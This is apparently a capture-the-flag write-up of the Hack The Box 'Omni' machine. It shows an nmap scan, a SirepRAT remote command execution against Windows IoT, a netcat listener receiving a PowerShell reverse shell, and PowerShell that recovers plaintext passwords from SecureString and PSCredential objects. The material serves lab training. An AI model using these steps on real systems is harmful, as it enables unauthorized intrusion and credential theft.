```
# Nmap 7.80 scan initiated Sun Sep 6 19:07:02 2020 as: nmap -p- -sC -sV -oN nmap/initial 10.10.10.204
Nmap scan report for 10.10.10.204
Host is up (0.075s latency).
Not shown: 65529 filtered ports
PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.80%I=7%D=9/6%Time=5F54C3C4%P=x86_64-pc-linux-gnu%r(NU
SF:LL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"\
SF:*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x04
SF:G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc
SF:9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 6 19:12:12 2020 -- 1 IP address (1 host up) scanned in 310.26 seconds
```
```
┌─[matt@parrot]─[~/Documents/HTB/Boxes/Omni/SirepRAT]
└──╼ $python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c dir C:\\" --v
---------
 Volume in drive C is MainOS
 Volume Serial Number is 3C37-C677
```
```
┌─[matt@parrot]─[~/Documents/HTB/Boxes/Omni] [14/14]
└──╼ $nc -nlvp 1337
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.204.
Ncat: Connection from 10.10.10.204:49682.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32> $env:username
$env:username
DefaultAccount
PS C:\>
```
User && Root.txt
We see that there are no users under Users; all of the users live in User under Data, and the usual enumeration tools, winPEAS.exe included, cannot be run here either. Searching for all of the common file types (bat, vbs, txt and so on), we find a hidden file of interest, r.bat.
However, some cmdlets do not accept a SecureString and require the password in plain text. In that case the SecureString object has to be decrypted back into plain text. If the account information has been wrapped in a PSCredential object, the password can be extracted from it in plain text.
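As an added illustration (not code from the original writeup), the following PowerShell shows the round trip the paragraph describes: a password goes into a SecureString, is wrapped in a PSCredential, and is recovered in plain text through GetNetworkCredential(). The user name and password are constructed sample values. It also shows why a credential saved with Export-Clixml is only DPAPI-protected for the same user on the same machine: Import-Clixml under that account rebuilds the PSCredential, so such files need the same protection as the password itself.

```powershell
# Added example: SecureString -> PSCredential -> plaintext round trip.
# 'app-svc' and 'S@mplePassw0rd!' are constructed sample values.
$plain  = 'S@mplePassw0rd!'
$secure = ConvertTo-SecureString -String $plain -AsPlainText -Force
$cred   = New-Object System.Management.Automation.PSCredential('app-svc', $secure)

# A cmdlet that takes -Credential can consume $cred without ever seeing $plain.
# A tool that insists on a plain-text password forces this decryption step:
$recovered = $cred.GetNetworkCredential().Password
if ($recovered -ne $plain) { throw 'round trip failed' }

# Equivalent without PSCredential, using the Marshal API directly:
$bstr = [Runtime.InteropServices.Marshal]::SecureStringToBSTR($secure)
try {
    $viaMarshal = [Runtime.InteropServices.Marshal]::PtrToStringBSTR($bstr)
} finally {
    # Free the unmanaged copy; the managed string still lingers until GC.
    [Runtime.InteropServices.Marshal]::ZeroFreeBSTR($bstr)
}
if ($viaMarshal -ne $plain) { throw 'marshal path failed' }

# Export-Clixml protects the SecureString with DPAPI, scoped to the current
# user on this machine. Re-importing under the same account yields the same
# PSCredential, so the saved file is as sensitive as the password itself.
$path = Join-Path $env:TEMP 'cred-demo.xml'
$cred | Export-Clixml -Path $path
$reloaded = Import-Clixml -Path $path
Remove-Item $path
if ($reloaded.GetNetworkCredential().Password -ne $plain) { throw 'clixml round trip failed' }
Write-Host "SecureString decrypted for user $($reloaded.UserName); protect the XML like a plaintext password."
```

Run this on Windows PowerShell or PowerShell 7 on Windows; on non-Windows hosts Export-Clixml does not apply DPAPI, so the saved file holds even less protection.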